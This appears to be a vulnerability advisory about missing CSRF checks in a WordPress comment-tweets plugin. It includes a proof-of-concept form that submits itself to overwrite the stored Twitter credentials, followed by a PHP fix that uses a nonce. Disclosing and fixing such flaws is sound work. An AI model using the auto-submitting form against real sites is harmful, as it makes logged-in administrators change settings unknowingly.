Description
The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks.
<form action="https://example.com/wp-admin/options-general.php?page=commenttweets%2FTwitterCommentNotification.php" method="POST">
<input type="text" name="twitterlogin" value="aaa">
<input type="text" name="twitterpw" value="bbb">
<input type="text" name="submit-type" value="login">
<input type="text" name="submit" value="save login">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.forms[0]
);
</script>
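One way to close the gap the form above relies on, shown as an added example and not the plugin's own code: a settings handler that requires a WordPress nonce and the manage_options capability before saving anything. The field names come from the form above; the function names, nonce names and option keys are assumptions.

```php
<?php
// Added example: hypothetical settings handler, not the plugin's actual code.
// Field names (twitterlogin, twitterpw, submit-type) are taken from the form
// on this page; nonce names, function names and option keys are assumptions.

const CT_NONCE_ACTION = 'commenttweets_save_login'; // assumed name
const CT_NONCE_FIELD  = 'commenttweets_nonce';      // assumed name

// Render the settings form with a nonce tied to the current user and action.
function ct_render_login_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field( CT_NONCE_ACTION, CT_NONCE_FIELD ); ?>
        <input type="text" name="twitterlogin"
               value="<?php echo esc_attr( get_option( 'ct_twitterlogin', '' ) ); ?>">
        <input type="password" name="twitterpw" value="">
        <input type="hidden" name="submit-type" value="login">
        <input type="submit" name="submit" value="save login">
    </form>
    <?php
}

// Save the submitted values only after capability and nonce checks pass.
function ct_handle_login_save() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    if ( ! isset( $_POST['submit-type'] ) || 'login' !== $_POST['submit-type'] ) {
        return;
    }
    // Only administrators may change the stored credentials.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request if the nonce is missing or invalid. A form hosted on
    // another origin cannot read this value, so its POST is rejected here.
    check_admin_referer( CT_NONCE_ACTION, CT_NONCE_FIELD );

    $login = sanitize_text_field( wp_unslash( $_POST['twitterlogin'] ?? '' ) );
    $pw    = wp_unslash( $_POST['twitterpw'] ?? '' );

    update_option( 'ct_twitterlogin', $login ); // assumed option key
    update_option( 'ct_twitterpw', $pw );       // assumed option key
}
add_action( 'admin_init', 'ct_handle_login_save' );
```

With this check in place, the auto-submitting form above is rejected because it carries no valid nonce field.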